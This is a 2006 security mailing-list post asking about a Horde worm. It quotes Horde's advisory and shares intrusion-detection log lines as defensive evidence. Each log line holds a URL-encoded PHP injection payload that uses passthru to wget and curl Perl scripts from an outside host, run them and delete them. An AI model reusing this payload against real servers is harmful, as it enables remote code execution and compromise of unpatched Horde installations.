[ossec-list] Horde worm in the wild.

Tue, 20 Jun 2006 18:36:31 -0700 

Is anyone noticing a new horde worm out there? It is related to the
following vulnerability (http://www.horde.org):

"
March 28th, 2006. The Horde Team has released a critical security fix
for the Horde Application Framework versions 3.0 and above. Version
2.x and earlier releases are not affected. The fixed Horde versions
3.0.10 and 3.1.1 are available. We strongly encourage every user to
update to the new versions immediately.

There are exploits in the wild for this vulnerability. They can only
exploit the user the webserver runs as, but are still serious. Please
upgrade now.
"

I'm getting alerts from ossec for the following logs (yes, my horde is
updated :)).
Is anyone seeing that?


217.160.242.70 - - [20/Jun/2006:13:41:22 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 38012 "-" "lwp-trivial/1.40"

204.14.90.21 - - [20/Jun/2006:19:00:34 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 37974 "-" "lwp-trivial/1.41"

204.14.90.21 - - [19/Jun/2006:03:07:23 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 37917 "-" "lwp-trivial/1.41"

69.16.208.123 - - [18/Jun/2006:11:15:13 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 37926 "-" "lwp-trivial/1.41"


Thanks,

--
Daniel B. Cid
dcid @ ( at ) ossec.net

--~--~---------~--~----~------------~-------~--~----~
-~----------~----~----~----~------~----~------~--~---

Reply via email to